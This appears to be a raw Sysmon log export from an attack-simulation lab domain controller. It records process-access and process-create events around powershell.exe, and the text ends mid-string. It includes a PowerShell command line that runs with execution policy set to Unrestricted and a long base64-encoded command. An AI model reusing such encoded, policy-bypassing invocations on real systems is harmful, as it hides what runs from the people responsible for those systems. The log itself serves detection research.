UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000221Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.655{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3DD3-5F80-FA02-000000007E01}3840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000220Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.655{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3DD3-5F80-FA02-000000007E01}3840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000219Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.624{733EE690-3DD3-5F80-FA02-000000007E01}3840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_s40jff1f.em4.ps12020-10-09 10:39:15.624 10341000x8000000000000000218Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.608{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD3-5F80-FA02-000000007E01}3840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000217Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3DD3-5F80-F802-000000007E01}47604960C:\Windows\system32\conhost.exe{733EE690-3DD3-5F80-FA02-000000007E01}3840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000216Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000215Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000214Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000213Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000212Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000211Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000210Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000209Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD3-5F80-FA02-000000007E01}3840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000208Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000207Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000206Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3DD3-5F80-F902-000000007E01}21964360C:\Windows\system32\cmd.exe{733EE690-3DD3-5F80-FA02-000000007E01}3840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000205Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000204Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000203Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.590{733EE690-3DD3-5F80-FA02-000000007E01}3840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAE